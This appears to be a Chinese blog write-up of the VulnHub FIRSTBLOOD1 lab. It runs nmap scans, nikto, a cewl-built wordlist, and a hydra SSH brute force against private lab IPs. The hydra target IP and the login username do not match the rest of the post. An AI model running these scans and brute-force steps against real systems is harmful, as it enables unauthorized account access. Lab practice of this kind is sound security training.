vulnhub-FIRSTBLOOD1靶场

vulnhub-FIRSTBLOOD1靶场

第一次vulnhub靶场练习FIRSTBLOOD1靶场下载

使用环境

kali虚拟机IP:192.168.255.139
linux目标机:192.168.255.141

靶机发现,漏洞利用

1.使用kali里的nmap扫出靶机ip

nmap -sP 192.168.255.0/24

123

2.发现靶机IP为192.168.255.141,接下来查看开放的端口,继续使用nmap

nmap -sS -sV -Pn -v -p- 192.168.255.141 //发现靶机开启了80端口跟60022端口,这60022端口是ssh远程协议

在这里插入图片描述
3.先用浏览器访问一波,发现上面都没有。
并没有什么用
4.我们再来看看网站源码。
在这里插入图片描述
5.看见有个/rambo.html文件,我们访问一下。
只是给我们的提示,最后还是让我们爆破ssh密码。
在这里插入图片描述
6.我们就按照他的提示使用Nikto工具来查看此服务器默认和不安全的文件,配置和程序。

//nikto基本使用:
//这里我们就用默认的就好了
//更新nikto工具
nikto -update
// 默认使用
nikto -h http://192.168.255.141
//指定端口,-port 或者-p
nikto -h http://192.168.255.141 -p 443

在这里插入图片描述
7.继续下一步。使用 cewl爬行网站获取关键信息创建一个密码字典。

// 直接只用下面命令
cewl -w words.txt -d 1 -m 5 http://192.168.255.141/johnnyrambo/
-m:最小单词长度
-w:创建txt文件,文件名是words.txt
-d:爬网深度
-e:收集包含emali地址信息
-c:每个单词出现的次数

在这里插入图片描述
8.使用wc文件统计命令来查看words.txt字典,发现共有137条密码。

wc -l words.txt
-c:统计字节数。
-l:统计行数。
-m:统计字符数。这个标志不能与 -c 标志一起使用。
-w:统计字数。一个字被定义为由空白、跳格或换行字符分隔的字符串。
-L:打印最长行的长度。
-help:显示帮助信息
--version:显示版本信息

在这里插入图片描述
9.接下来就是爆破ssh密码了,这里我们用到Hydra工具进行爆破。

hydra -l johnny -P words.txt -v 192.168.86.132 ssh -s 60022 -t 4
-l:指定用户名 //这里我们指定Johnny这个用户进行爆破
-P:表示密码文件
-v:表示详细
-s:用于端口 //因为它位于非默认端口上
-t:表示线程 //速度更快!

在这里插入图片描述
10.登了5分钟之后终于爆出来了,接下来直接ssh远程连接就行了。

ssh -l johny -p 60022 192.168.255.141

在这里插入图片描述
就这样吧 结束!

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值